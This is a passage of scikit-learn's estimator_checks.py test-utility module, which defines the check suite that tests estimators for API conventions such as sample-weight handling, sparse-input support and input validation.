2021-03-28T08:57:36.000Z
2021-03-28T08:57:36.000Z
sklearn/utils/estimator_checks.py
abhinav2301/scikit-learn
896d4fad106c8f1d745923d544b44a0707103aa2
[ "BSD-3-Clause" ]
null
null
null
sklearn/utils/estimator_checks.py
abhinav2301/scikit-learn
896d4fad106c8f1d745923d544b44a0707103aa2
[ "BSD-3-Clause" ]
null
null
null
import types import warnings import sys import traceback import pickle import re from copy import deepcopy from functools import partial, wraps from inspect import signature import numpy as np from scipy import sparse from scipy.stats import rankdata import joblib from . import IS_PYPY from .. import config_context from ._testing import assert_raises, _get_args from ._testing import assert_raises_regex from ._testing import assert_raise_message from ._testing import assert_array_equal from ._testing import assert_array_almost_equal from ._testing import assert_allclose from ._testing import assert_allclose_dense_sparse from ._testing import assert_warns_message from ._testing import set_random_state from ._testing import SkipTest from ._testing import ignore_warnings from ._testing import create_memmap_backed_data from . import is_scalar_nan from ..discriminant_analysis import LinearDiscriminantAnalysis from ..linear_model import Ridge from ..base import ( clone, ClusterMixin, is_classifier, is_regressor, is_outlier_detector, RegressorMixin, ) from ..metrics import accuracy_score, adjusted_rand_score, f1_score from ..random_projection import BaseRandomProjection from ..feature_selection import SelectKBest from ..pipeline import make_pipeline from ..exceptions import DataConversionWarning from ..exceptions import NotFittedError from ..exceptions import SkipTestWarning from ..model_selection import train_test_split from ..model_selection import ShuffleSplit from ..model_selection._validation import _safe_split from ..metrics.pairwise import (rbf_kernel, linear_kernel, pairwise_distances) from .import shuffle from .validation import has_fit_parameter, _num_samples from ..preprocessing import StandardScaler from ..preprocessing import scale from ..datasets import ( load_iris, make_blobs, make_multilabel_classification, make_regression, ) REGRESSION_DATASET = None CROSS_DECOMPOSITION = ['PLSCanonical', 'PLSRegression', 'CCA', 'PLSSVD'] def _yield_checks(estimator): name 
= estimator.__class__.__name__ tags = estimator._get_tags() yield check_no_attributes_set_in_init yield check_estimators_dtypes yield check_fit_score_takes_y yield check_sample_weights_pandas_series yield check_sample_weights_not_an_array yield check_sample_weights_list yield check_sample_weights_shape if (has_fit_parameter(estimator, "sample_weight") and not (hasattr(estimator, "_pairwise") and estimator._pairwise)): # We skip pairwise because the data is not pairwise yield partial(check_sample_weights_invariance, kind='ones') yield partial(check_sample_weights_invariance, kind='zeros') yield check_estimators_fit_returns_self yield partial(check_estimators_fit_returns_self, readonly_memmap=True) # Check that all estimator yield informative messages when # trained on empty datasets if not tags["no_validation"]: yield check_complex_data yield check_dtype_object yield check_estimators_empty_data_messages if name not in CROSS_DECOMPOSITION: # cross-decomposition's "transform" returns X and Y yield check_pipeline_consistency if not tags["allow_nan"] and not tags["no_validation"]: # Test that all estimators check their input for NaN's and infs yield check_estimators_nan_inf if _is_pairwise(estimator): # Check that pairwise estimator throws error on non-square input yield check_nonsquare_error yield check_estimators_overwrite_params if hasattr(estimator, 'sparsify'): yield check_sparsify_coefficients yield check_estimator_sparse_data # Test that estimators can be pickled, and once pickled # give the same answer as before. 
yield check_estimators_pickle def _yield_classifier_checks(classifier): tags = classifier._get_tags() # test classifiers can handle non-array data and pandas objects yield check_classifier_data_not_an_array # test classifiers trained on a single label always return this label yield check_classifiers_one_label yield check_classifiers_classes yield check_estimators_partial_fit_n_features if tags["multioutput"]: yield check_classifier_multioutput # basic consistency testing yield check_classifiers_train yield partial(check_classifiers_train, readonly_memmap=True) yield partial(check_classifiers_train, readonly_memmap=True, X_dtype='float32') yield check_classifiers_regression_target if tags["multilabel"]: yield check_classifiers_multilabel_representation_invariance if not tags["no_validation"]: yield check_supervised_y_no_nan yield check_supervised_y_2d if tags["requires_fit"]: yield check_estimators_unfitted if 'class_weight' in classifier.get_params().keys(): yield check_class_weight_classifiers yield check_non_transformer_estimators_n_iter # test if predict_proba is a monotonic transformation of decision_function yield check_decision_proba_consistency @ignore_warnings(category=FutureWarning) def check_supervised_y_no_nan(name, estimator_orig, strict_mode=True): # Checks that the Estimator targets are not NaN. estimator = clone(estimator_orig) rng = np.random.RandomState(888) X = rng.randn(10, 5) y = np.full(10, np.inf) y = _enforce_estimator_tags_y(estimator, y) errmsg = "Input contains NaN, infinity or a value too large for " \ "dtype('float64')." 
try: estimator.fit(X, y) except ValueError as e: if str(e) != errmsg: raise ValueError("Estimator {0} raised error as expected, but " "does not match expected error message" .format(name)) else: raise ValueError("Estimator {0} should have raised error on fitting " "array y with NaN value.".format(name)) def _yield_regressor_checks(regressor): tags = regressor._get_tags() # TODO: test with intercept # TODO: test with multiple responses # basic testing yield check_regressors_train yield partial(check_regressors_train, readonly_memmap=True) yield partial(check_regressors_train, readonly_memmap=True, X_dtype='float32') yield check_regressor_data_not_an_array yield check_estimators_partial_fit_n_features if tags["multioutput"]: yield check_regressor_multioutput yield check_regressors_no_decision_function if not tags["no_validation"]: yield check_supervised_y_2d yield check_supervised_y_no_nan name = regressor.__class__.__name__ if name != 'CCA': # check that the regressor handles int input yield check_regressors_int if tags["requires_fit"]: yield check_estimators_unfitted yield check_non_transformer_estimators_n_iter def _yield_transformer_checks(transformer): tags = transformer._get_tags() # All transformers should either deal with sparse data or raise an # exception with type TypeError and an intelligible error message if not tags["no_validation"]: yield check_transformer_data_not_an_array # these don't actually fit the data, so don't raise errors yield check_transformer_general if tags["preserves_dtype"]: yield check_transformer_preserve_dtypes yield partial(check_transformer_general, readonly_memmap=True) if not transformer._get_tags()["stateless"]: yield check_transformers_unfitted # Dependent on external solvers and hence accessing the iter # param is non-trivial. 
external_solver = ['Isomap', 'KernelPCA', 'LocallyLinearEmbedding', 'RandomizedLasso', 'LogisticRegressionCV'] name = transformer.__class__.__name__ if name not in external_solver: yield check_transformer_n_iter def _yield_clustering_checks(clusterer): yield check_clusterer_compute_labels_predict name = clusterer.__class__.__name__ if name not in ('WardAgglomeration', "FeatureAgglomeration"): # this is clustering on the features # let's not test that here. yield check_clustering yield partial(check_clustering, readonly_memmap=True) yield check_estimators_partial_fit_n_features yield check_non_transformer_estimators_n_iter def _yield_outliers_checks(estimator): # checks for outlier detectors that have a fit_predict method if hasattr(estimator, 'fit_predict'): yield check_outliers_fit_predict # checks for estimators that can be used on a test set if hasattr(estimator, 'predict'): yield check_outliers_train yield partial(check_outliers_train, readonly_memmap=True) # test outlier detectors can handle non-array data yield check_classifier_data_not_an_array # test if NotFittedError is raised if estimator._get_tags()["requires_fit"]: yield check_estimators_unfitted def _yield_all_checks(estimator): name = estimator.__class__.__name__ tags = estimator._get_tags() if "2darray" not in tags["X_types"]: warnings.warn("Can't test estimator {} which requires input " " of type {}".format(name, tags["X_types"]), SkipTestWarning) return if tags["_skip_test"]: warnings.warn("Explicit SKIP via _skip_test tag for estimator " "{}.".format(name), SkipTestWarning) return for check in _yield_checks(estimator): yield check if is_classifier(estimator): for check in _yield_classifier_checks(estimator): yield check if is_regressor(estimator): for check in _yield_regressor_checks(estimator): yield check if hasattr(estimator, 'transform'): for check in _yield_transformer_checks(estimator): yield check if isinstance(estimator, ClusterMixin): for check in _yield_clustering_checks(estimator): 
yield check if is_outlier_detector(estimator): for check in _yield_outliers_checks(estimator): yield check yield check_parameters_default_constructible yield check_fit2d_predict1d yield check_methods_subset_invariance yield check_fit2d_1sample yield check_fit2d_1feature yield check_fit1d yield check_get_params_invariance yield check_set_params yield check_dict_unchanged yield check_dont_overwrite_parameters yield check_fit_idempotent if not tags["no_validation"]: yield check_n_features_in if tags["requires_y"]: yield check_requires_y_none if tags["requires_positive_X"]: yield check_fit_non_negative def _get_check_estimator_ids(obj): """Create pytest ids for checks. When `obj` is an estimator, this returns the pprint version of the estimator (with `print_changed_only=True`). When `obj` is a function, the name of the function is returned with its keyworld arguments. `_get_check_estimator_ids` is designed to be used as the `id` in `pytest.mark.parametrize` where `check_estimator(..., generate_only=True)` is yielding estimators and checks. Parameters ---------- obj : estimator or function Items generated by `check_estimator`. 
Returns ------- id : str or None See Also -------- check_estimator """ if callable(obj): if not isinstance(obj, partial): return obj.__name__ if not obj.keywords: return obj.func.__name__ kwstring = ",".join(["{}={}".format(k, v) for k, v in obj.keywords.items()]) return "{}({})".format(obj.func.__name__, kwstring) if hasattr(obj, "get_params"): with config_context(print_changed_only=True): return re.sub(r"\s", "", str(obj)) def _construct_instance(Estimator): """Construct Estimator instance if possible.""" required_parameters = getattr(Estimator, "_required_parameters", []) if len(required_parameters): if required_parameters in (["estimator"], ["base_estimator"]): if issubclass(Estimator, RegressorMixin): estimator = Estimator(Ridge()) else: estimator = Estimator(LinearDiscriminantAnalysis()) else: raise SkipTest("Can't instantiate estimator {} which requires " "parameters {}".format(Estimator.__name__, required_parameters)) else: estimator = Estimator() return estimator def _maybe_mark_xfail(estimator, check, strict_mode, pytest): # Mark (estimator, check) pairs as XFAIL if needed (see conditions in # _should_be_skipped_or_marked()) # This is similar to _maybe_skip(), but this one is used by # @parametrize_with_checks() instead of check_estimator() should_be_marked, reason = _should_be_skipped_or_marked(estimator, check, strict_mode) if not should_be_marked: return estimator, check else: return pytest.param(estimator, check, marks=pytest.mark.xfail(reason=reason)) def _maybe_skip(estimator, check, strict_mode): # Wrap a check so that it's skipped if needed (see conditions in # _should_be_skipped_or_marked()) # This is similar to _maybe_mark_xfail(), but this one is used by # check_estimator() instead of @parametrize_with_checks which requires # pytest should_be_skipped, reason = _should_be_skipped_or_marked(estimator, check, strict_mode) if not should_be_skipped: return check check_name = (check.func.__name__ if isinstance(check, partial) else check.__name__) 
@wraps(check) def wrapped(*args, **kwargs): raise SkipTest( f"Skipping {check_name} for {estimator.__class__.__name__}: " f"{reason}" ) return wrapped def _should_be_skipped_or_marked(estimator, check, strict_mode): # Return whether a check should be skipped (when using check_estimator()) # or marked as XFAIL (when using @parametrize_with_checks()), along with a # reason. # A check should be skipped or marked if either: # - the check is in the _xfail_checks tag of the estimator # - the check is fully strict and strict mode is off # Checks that are only partially strict will not be skipped since we want # to run their non-strict parts. check_name = (check.func.__name__ if isinstance(check, partial) else check.__name__) xfail_checks = estimator._get_tags()['_xfail_checks'] or {} if check_name in xfail_checks: return True, xfail_checks[check_name] if check_name in _FULLY_STRICT_CHECKS and not strict_mode: return True, f'{check_name} is fully strict and strict mode is off' return False, 'placeholder reason that will never be used' def parametrize_with_checks(estimators, strict_mode=True): """Pytest specific decorator for parametrizing estimator checks. The `id` of each check is set to be a pprint version of the estimator and the name of the check with its keyword arguments. This allows to use `pytest -k` to specify which tests to run:: pytest test_check_estimators.py -k check_estimators_fit_returns_self Parameters ---------- estimators : list of estimators instances Estimators to generated checks for. .. versionchanged:: 0.24 Passing a class was deprecated in version 0.23, and support for classes was removed in 0.24. Pass an instance instead. strict_mode : bool, default=True If True, the full check suite is run. If False, only the non-strict part of the check suite is run. In non-strict mode, some checks will be easier to pass: e.g., they will only make sure an error is raised instead of also checking the full error message. 
Some checks are considered completely strict, in which case they are treated as if they were in the estimators' `_xfails_checks` tag: they will be marked as `xfail` for pytest. See :ref:`estimator_tags` for more info on the `_xfails_check` tag. The set of strict checks is in `sklearn.utils.estimator_checks._FULLY_STRICT_CHECKS`. .. versionadded:: 0.24 Returns ------- decorator : `pytest.mark.parametrize` Examples -------- >>> from sklearn.utils.estimator_checks import parametrize_with_checks >>> from sklearn.linear_model import LogisticRegression >>> from sklearn.tree import DecisionTreeRegressor >>> @parametrize_with_checks([LogisticRegression(), ... DecisionTreeRegressor()]) ... def test_sklearn_compatible_estimator(estimator, check): ... check(estimator) """ import pytest if any(isinstance(est, type) for est in estimators): msg = ("Passing a class was deprecated in version 0.23 " "and isn't supported anymore from 0.24." "Please pass an instance instead.") raise TypeError(msg) def checks_generator(): for estimator in estimators: name = type(estimator).__name__ for check in _yield_all_checks(estimator): check = partial(check, name, strict_mode=strict_mode) yield _maybe_mark_xfail(estimator, check, strict_mode, pytest) return pytest.mark.parametrize("estimator, check", checks_generator(), ids=_get_check_estimator_ids) def check_estimator(Estimator, generate_only=False, strict_mode=True): """Check if estimator adheres to scikit-learn conventions. This estimator will run an extensive test-suite for input validation, shapes, etc, making sure that the estimator complies with `scikit-learn` conventions as detailed in :ref:`rolling_your_own_estimator`. Additional tests for classifiers, regressors, clustering or transformers will be run if the Estimator class inherits from the corresponding mixin from sklearn.base. Setting `generate_only=True` returns a generator that yields (estimator, check) tuples where the check can be called independently from each other, i.e. 
`check(estimator)`. This allows all checks to be run independently and report the checks that are failing. scikit-learn provides a pytest specific decorator, :func:`~sklearn.utils.parametrize_with_checks`, making it easier to test multiple estimators. Parameters ---------- estimator : estimator object Estimator instance to check. .. versionchanged:: 0.24 Passing a class was deprecated in version 0.23, and support for classes was removed in 0.24. generate_only : bool, default=False When `False`, checks are evaluated when `check_estimator` is called. When `True`, `check_estimator` returns a generator that yields (estimator, check) tuples. The check is run by calling `check(estimator)`. .. versionadded:: 0.22 strict_mode : bool, default=True If True, the full check suite is run. If False, only the non-strict part of the check suite is run. In non-strict mode, some checks will be easier to pass: e.g., they will only make sure an error is raised instead of also checking the full error message. Some checks are considered completely strict, in which case they are treated as if they were in the estimators' `_xfails_checks` tag: they will be ignored with a warning. See :ref:`estimator_tags` for more info on the `_xfails_check` tag. The set of strict checks is in `sklearn.utils.estimator_checks._FULLY_STRICT_CHECKS`. .. versionadded:: 0.24 Returns ------- checks_generator : generator Generator that yields (estimator, check) tuples. Returned when `generate_only=True`. """ if isinstance(Estimator, type): msg = ("Passing a class was deprecated in version 0.23 " "and isn't supported anymore from 0.24." 
"Please pass an instance instead.") raise TypeError(msg) estimator = Estimator name = type(estimator).__name__ def checks_generator(): for check in _yield_all_checks(estimator): check = _maybe_skip(estimator, check, strict_mode) yield estimator, partial(check, name, strict_mode=strict_mode) if generate_only: return checks_generator() for estimator, check in checks_generator(): try: check(estimator) except SkipTest as exception: # SkipTest is thrown when pandas can't be imported, or by checks # that are in the xfail_checks tag warnings.warn(str(exception), SkipTestWarning) def _regression_dataset(): global REGRESSION_DATASET if REGRESSION_DATASET is None: X, y = make_regression( n_samples=200, n_features=10, n_informative=1, bias=5.0, noise=20, random_state=42, ) X = StandardScaler().fit_transform(X) REGRESSION_DATASET = X, y return REGRESSION_DATASET def _set_checking_parameters(estimator): # set parameters to speed up some estimators and # avoid deprecated behaviour params = estimator.get_params() name = estimator.__class__.__name__ if ("n_iter" in params and name != "TSNE"): estimator.set_params(n_iter=5) if "max_iter" in params: if estimator.max_iter is not None: estimator.set_params(max_iter=min(5, estimator.max_iter)) # LinearSVR, LinearSVC if estimator.__class__.__name__ in ['LinearSVR', 'LinearSVC']: estimator.set_params(max_iter=20) # NMF if estimator.__class__.__name__ == 'NMF': estimator.set_params(max_iter=100) # MLP if estimator.__class__.__name__ in ['MLPClassifier', 'MLPRegressor']: estimator.set_params(max_iter=100) if "n_resampling" in params: # randomized lasso estimator.set_params(n_resampling=5) if "n_estimators" in params: estimator.set_params(n_estimators=min(5, estimator.n_estimators)) if "max_trials" in params: # RANSAC estimator.set_params(max_trials=10) if "n_init" in params: # K-Means estimator.set_params(n_init=2) if name == 'TruncatedSVD': # TruncatedSVD doesn't run with n_components = n_features # This is ugly :-/ estimator.n_components 
= 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = min(estimator.n_clusters, 2) if hasattr(estimator, "n_best"): estimator.n_best = 1 if name == "SelectFdr": # be tolerant of noisy datasets (not actually speed) estimator.set_params(alpha=.5) if name == "TheilSenRegressor": estimator.max_subpopulation = 100 if isinstance(estimator, BaseRandomProjection): # Due to the jl lemma and often very few samples, the number # of components of the random matrix projection will be probably # greater than the number of features. # So we impose a smaller number (avoid "auto" mode) estimator.set_params(n_components=2) if isinstance(estimator, SelectKBest): # SelectKBest has a default of k=10 # which is more feature than we have in most case. estimator.set_params(k=1) if name in ('HistGradientBoostingClassifier', 'HistGradientBoostingRegressor'): # The default min_samples_leaf (20) isn't appropriate for small # datasets (only very shallow trees are built) that the checks use. estimator.set_params(min_samples_leaf=5) if name == 'DummyClassifier': # the default strategy prior would output constant predictions and fail # for check_classifiers_predictions estimator.set_params(strategy='stratified') # Speed-up by reducing the number of CV or splits for CV estimators loo_cv = ['RidgeCV'] if name not in loo_cv and hasattr(estimator, 'cv'): estimator.set_params(cv=3) if hasattr(estimator, 'n_splits'): estimator.set_params(n_splits=3) if name == 'OneHotEncoder': estimator.set_params(handle_unknown='ignore') class _NotAnArray: """An object that is convertible to an array. Parameters ---------- data : array-like The data. 
""" def __init__(self, data): self.data = np.asarray(data) def __array__(self, dtype=None): return self.data def __array_function__(self, func, types, args, kwargs): if func.__name__ == "may_share_memory": return True raise TypeError("Don't want to call array_function {}!".format( func.__name__)) def _is_pairwise(estimator): """Returns True if estimator has a _pairwise attribute set to True. Parameters ---------- estimator : object Estimator object to test. Returns ------- out : bool True if _pairwise is set to True and False otherwise. """ return bool(getattr(estimator, "_pairwise", False)) def _is_pairwise_metric(estimator): """Returns True if estimator accepts pairwise metric. Parameters ---------- estimator : object Estimator object to test. Returns ------- out : bool True if _pairwise is set to True and False otherwise. """ metric = getattr(estimator, "metric", None) return bool(metric == 'precomputed') def _pairwise_estimator_convert_X(X, estimator, kernel=linear_kernel): if _is_pairwise_metric(estimator): return pairwise_distances(X, metric='euclidean') if _is_pairwise(estimator): return kernel(X, X) return X def _generate_sparse_matrix(X_csr): """Generate sparse matrices with {32,64}bit indices of diverse format. Parameters ---------- X_csr: CSR Matrix Input matrix in CSR format. 
Returns ------- out: iter(Matrices) In format['dok', 'lil', 'dia', 'bsr', 'csr', 'csc', 'coo', 'coo_64', 'csc_64', 'csr_64'] """ assert X_csr.format == 'csr' yield 'csr', X_csr.copy() for sparse_format in ['dok', 'lil', 'dia', 'bsr', 'csc', 'coo']: yield sparse_format, X_csr.asformat(sparse_format) # Generate large indices matrix only if its supported by scipy X_coo = X_csr.asformat('coo') X_coo.row = X_coo.row.astype('int64') X_coo.col = X_coo.col.astype('int64') yield "coo_64", X_coo for sparse_format in ['csc', 'csr']: X = X_csr.asformat(sparse_format) X.indices = X.indices.astype('int64') X.indptr = X.indptr.astype('int64') yield sparse_format + "_64", X def check_estimator_sparse_data(name, estimator_orig, strict_mode=True): rng = np.random.RandomState(0) X = rng.rand(40, 10) X[X < .8] = 0 X = _pairwise_estimator_convert_X(X, estimator_orig) X_csr = sparse.csr_matrix(X) y = (4 * rng.rand(40)).astype(int) # catch deprecation warnings with ignore_warnings(category=FutureWarning): estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) tags = estimator_orig._get_tags() for matrix_format, X in _generate_sparse_matrix(X_csr): # catch deprecation warnings with ignore_warnings(category=FutureWarning): estimator = clone(estimator_orig) if name in ['Scaler', 'StandardScaler']: estimator.set_params(with_mean=False) # fit and predict try: with ignore_warnings(category=FutureWarning): estimator.fit(X, y) if hasattr(estimator, "predict"): pred = estimator.predict(X) if tags['multioutput_only']: assert pred.shape == (X.shape[0], 1) else: assert pred.shape == (X.shape[0],) if hasattr(estimator, 'predict_proba'): probs = estimator.predict_proba(X) if tags['binary_only']: expected_probs_shape = (X.shape[0], 2) else: expected_probs_shape = (X.shape[0], 4) assert probs.shape == expected_probs_shape except (TypeError, ValueError) as e: if 'sparse' not in repr(e).lower(): if "64" in matrix_format: msg = ("Estimator %s doesn't seem to support %s matrix, " "and 
is not failing gracefully, e.g. by using " "check_array(X, accept_large_sparse=False)") raise AssertionError(msg % (name, matrix_format)) else: print("Estimator %s doesn't seem to fail gracefully on " "sparse data: error message state explicitly that " "sparse input is not supported if this is not" " the case." % name) raise except Exception: print("Estimator %s doesn't seem to fail gracefully on " "sparse data: it should raise a TypeError if sparse input " "is explicitly not supported." % name) raise @ignore_warnings(category=FutureWarning) def check_sample_weights_pandas_series(name, estimator_orig, strict_mode=True): # check that estimators will accept a 'sample_weight' parameter of # type pandas.Series in the 'fit' function. estimator = clone(estimator_orig) if has_fit_parameter(estimator, "sample_weight"): try: import pandas as pd X = np.array([[1, 1], [1, 2], [1, 3], [1, 4], [2, 1], [2, 2], [2, 3], [2, 4], [3, 1], [3, 2], [3, 3], [3, 4]]) X = pd.DataFrame(_pairwise_estimator_convert_X(X, estimator_orig)) y = pd.Series([1, 1, 1, 1, 2, 2, 2, 2, 1, 1, 2, 2]) weights = pd.Series([1] * 12) if estimator._get_tags()["multioutput_only"]: y = pd.DataFrame(y) try: estimator.fit(X, y, sample_weight=weights) except ValueError: raise ValueError("Estimator {0} raises error if " "'sample_weight' parameter is of " "type pandas.Series".format(name)) except ImportError: raise SkipTest("pandas is not installed: not testing for " "input of type pandas.Series to class weight.") @ignore_warnings(category=(FutureWarning)) def check_sample_weights_not_an_array(name, estimator_orig, strict_mode=True): # check that estimators will accept a 'sample_weight' parameter of # type _NotAnArray in the 'fit' function. 
    estimator = clone(estimator_orig)
    if has_fit_parameter(estimator, "sample_weight"):
        X = np.array([[1, 1], [1, 2], [1, 3], [1, 4],
                      [2, 1], [2, 2], [2, 3], [2, 4],
                      [3, 1], [3, 2], [3, 3], [3, 4]])
        X = _NotAnArray(_pairwise_estimator_convert_X(X, estimator_orig))
        y = _NotAnArray([1, 1, 1, 1, 2, 2, 2, 2, 1, 1, 2, 2])
        weights = _NotAnArray([1] * 12)
        if estimator._get_tags()["multioutput_only"]:
            # multioutput-only estimators need a 2d y
            y = _NotAnArray(y.data.reshape(-1, 1))
        estimator.fit(X, y, sample_weight=weights)


@ignore_warnings(category=(FutureWarning))
def check_sample_weights_list(name, estimator_orig, strict_mode=True):
    # check that estimators will accept a 'sample_weight' parameter of
    # type list in the 'fit' function.
    if has_fit_parameter(estimator_orig, "sample_weight"):
        estimator = clone(estimator_orig)
        rnd = np.random.RandomState(0)
        n_samples = 30
        X = _pairwise_estimator_convert_X(rnd.uniform(size=(n_samples, 3)),
                                          estimator_orig)
        y = np.arange(n_samples) % 3
        y = _enforce_estimator_tags_y(estimator, y)
        sample_weight = [3] * n_samples
        # Test that estimators don't raise any exception
        estimator.fit(X, y, sample_weight=sample_weight)


@ignore_warnings(category=FutureWarning)
def check_sample_weights_shape(name, estimator_orig, strict_mode=True):
    # check that estimators raise an error if sample_weight
    # shape mismatches the input
    if (has_fit_parameter(estimator_orig, "sample_weight") and
            not (hasattr(estimator_orig, "_pairwise")
                 and estimator_orig._pairwise)):
        estimator = clone(estimator_orig)
        X = np.array([[1, 3], [1, 3], [1, 3], [1, 3],
                      [2, 1], [2, 1], [2, 1], [2, 1],
                      [3, 3], [3, 3], [3, 3], [3, 3],
                      [4, 1], [4, 1], [4, 1], [4, 1]])
        y = np.array([1, 1, 1, 1, 2, 2, 2, 2,
                      1, 1, 1, 1, 2, 2, 2, 2])
        y = _enforce_estimator_tags_y(estimator, y)

        # matching shape must be accepted...
        estimator.fit(X, y, sample_weight=np.ones(len(y)))

        # ...while a too-long 1d weight vector must raise
        assert_raises(ValueError, estimator.fit, X, y,
                      sample_weight=np.ones(2*len(y)))

        # ...and so must a 2d weight array
        assert_raises(ValueError, estimator.fit, X, y,
                      sample_weight=np.ones((len(y), 2)))


@ignore_warnings(category=FutureWarning)
def
check_sample_weights_invariance(name, estimator_orig, kind="ones", strict_mode=True): # For kind="ones" check that the estimators yield same results for # unit weights and no weights # For kind="zeros" check that setting sample_weight to 0 is equivalent # to removing corresponding samples. estimator1 = clone(estimator_orig) estimator2 = clone(estimator_orig) set_random_state(estimator1, random_state=0) set_random_state(estimator2, random_state=0) X1 = np.array([[1, 3], [1, 3], [1, 3], [1, 3], [2, 1], [2, 1], [2, 1], [2, 1], [3, 3], [3, 3], [3, 3], [3, 3], [4, 1], [4, 1], [4, 1], [4, 1]], dtype=np.float64) y1 = np.array([1, 1, 1, 1, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2], dtype=int) if kind == 'ones': X2 = X1 y2 = y1 sw2 = np.ones(shape=len(y1)) err_msg = (f"For {name} sample_weight=None is not equivalent to " f"sample_weight=ones") elif kind == 'zeros': # Construct a dataset that is very different to (X, y) if weights # are disregarded, but identical to (X, y) given weights. X2 = np.vstack([X1, X1 + 1]) y2 = np.hstack([y1, 3 - y1]) sw2 = np.ones(shape=len(y1) * 2) sw2[len(y1):] = 0 X2, y2, sw2 = shuffle(X2, y2, sw2, random_state=0) err_msg = (f"For {name}, a zero sample_weight is not equivalent " f"to removing the sample") else: # pragma: no cover raise ValueError y1 = _enforce_estimator_tags_y(estimator1, y1) y2 = _enforce_estimator_tags_y(estimator2, y2) estimator1.fit(X1, y=y1, sample_weight=None) estimator2.fit(X2, y=y2, sample_weight=sw2) for method in ["predict", "predict_proba", "decision_function", "transform"]: if hasattr(estimator_orig, method): X_pred1 = getattr(estimator1, method)(X1) X_pred2 = getattr(estimator2, method)(X1) assert_allclose_dense_sparse(X_pred1, X_pred2, err_msg=err_msg) @ignore_warnings(category=(FutureWarning, UserWarning)) def check_dtype_object(name, estimator_orig, strict_mode=True): # check that estimators treat dtype object as numeric if possible rng = np.random.RandomState(0) X = _pairwise_estimator_convert_X(rng.rand(40, 10), 
                                         estimator_orig)
    X = X.astype(object)
    tags = estimator_orig._get_tags()
    y = (X[:, 0] * 4).astype(int)
    estimator = clone(estimator_orig)
    y = _enforce_estimator_tags_y(estimator, y)

    estimator.fit(X, y)
    if hasattr(estimator, "predict"):
        estimator.predict(X)

    if hasattr(estimator, "transform"):
        estimator.transform(X)

    try:
        # object-dtype labels: only an "Unknown label type" complaint is
        # tolerated here; any other failure is re-raised
        estimator.fit(X, y.astype(object))
    except Exception as e:
        if "Unknown label type" not in str(e):
            raise

    if 'string' not in tags['X_types']:
        # a dict entry cannot be coerced to a number, so fit must raise
        X[0, 0] = {'foo': 'bar'}
        msg = "argument must be a string.* number"
        assert_raises_regex(TypeError, msg, estimator.fit, X, y)
    else:
        # Estimators supporting string will not call np.asarray to convert the
        # data to numeric and therefore, the error will not be raised.
        # Checking for each element dtype in the input array will be costly.
        # Refer to #11401 for full discussion.
        estimator.fit(X, y)


def check_complex_data(name, estimator_orig, strict_mode=True):
    # check that estimators raise an exception on providing complex data
    X = np.random.sample(10) + 1j * np.random.sample(10)
    X = X.reshape(-1, 1)
    y = np.random.sample(10) + 1j * np.random.sample(10)
    estimator = clone(estimator_orig)
    assert_raises_regex(ValueError, "Complex data not supported",
                        estimator.fit, X, y)


@ignore_warnings
def check_dict_unchanged(name, estimator_orig, strict_mode=True):
    # this estimator raises
    # ValueError: Found array with 0 feature(s) (shape=(23, 0))
    # while a minimum of 1 is required.
# error if name in ['SpectralCoclustering']: return rnd = np.random.RandomState(0) if name in ['RANSACRegressor']: X = 3 * rnd.uniform(size=(20, 3)) else: X = 2 * rnd.uniform(size=(20, 3)) X = _pairwise_estimator_convert_X(X, estimator_orig) y = X[:, 0].astype(int) estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) if hasattr(estimator, "n_components"): estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = 1 if hasattr(estimator, "n_best"): estimator.n_best = 1 set_random_state(estimator, 1) estimator.fit(X, y) for method in ["predict", "transform", "decision_function", "predict_proba"]: if hasattr(estimator, method): dict_before = estimator.__dict__.copy() getattr(estimator, method)(X) assert estimator.__dict__ == dict_before, ( 'Estimator changes __dict__ during %s' % method) def _is_public_parameter(attr): return not (attr.startswith('_') or attr.endswith('_')) @ignore_warnings(category=FutureWarning) def check_dont_overwrite_parameters(name, estimator_orig, strict_mode=True): # check that fit method only changes or sets private attributes if hasattr(estimator_orig.__init__, "deprecated_original"): # to not check deprecated classes return estimator = clone(estimator_orig) rnd = np.random.RandomState(0) X = 3 * rnd.uniform(size=(20, 3)) X = _pairwise_estimator_convert_X(X, estimator_orig) y = X[:, 0].astype(int) y = _enforce_estimator_tags_y(estimator, y) if hasattr(estimator, "n_components"): estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = 1 set_random_state(estimator, 1) dict_before_fit = estimator.__dict__.copy() estimator.fit(X, y) dict_after_fit = estimator.__dict__ public_keys_after_fit = [key for key in dict_after_fit.keys() if _is_public_parameter(key)] attrs_added_by_fit = [key for key in public_keys_after_fit if key not in dict_before_fit.keys()] # check that fit doesn't add any public attribute assert not attrs_added_by_fit, ( 'Estimator adds public 
attribute(s) during' ' the fit method.' ' Estimators are only allowed to add private attributes' ' either started with _ or ended' ' with _ but %s added' % ', '.join(attrs_added_by_fit)) # check that fit doesn't change any public attribute attrs_changed_by_fit = [key for key in public_keys_after_fit if (dict_before_fit[key] is not dict_after_fit[key])] assert not attrs_changed_by_fit, ( 'Estimator changes public attribute(s) during' ' the fit method. Estimators are only allowed' ' to change attributes started' ' or ended with _, but' ' %s changed' % ', '.join(attrs_changed_by_fit)) @ignore_warnings(category=FutureWarning) def check_fit2d_predict1d(name, estimator_orig, strict_mode=True): # check by fitting a 2d array and predicting with a 1d array rnd = np.random.RandomState(0) X = 3 * rnd.uniform(size=(20, 3)) X = _pairwise_estimator_convert_X(X, estimator_orig) y = X[:, 0].astype(int) tags = estimator_orig._get_tags() estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) if hasattr(estimator, "n_components"): estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = 1 set_random_state(estimator, 1) estimator.fit(X, y) if tags["no_validation"]: # FIXME this is a bit loose return for method in ["predict", "transform", "decision_function", "predict_proba"]: if hasattr(estimator, method): assert_raise_message(ValueError, "Reshape your data", getattr(estimator, method), X[0]) def _apply_on_subsets(func, X): # apply function on the whole set and on mini batches result_full = func(X) n_features = X.shape[1] result_by_batch = [func(batch.reshape(1, n_features)) for batch in X] # func can output tuple (e.g. 
score_samples)
    if type(result_full) == tuple:
        # compare only the first element of a tuple-returning method
        result_full = result_full[0]
        result_by_batch = list(map(lambda x: x[0], result_by_batch))

    if sparse.issparse(result_full):
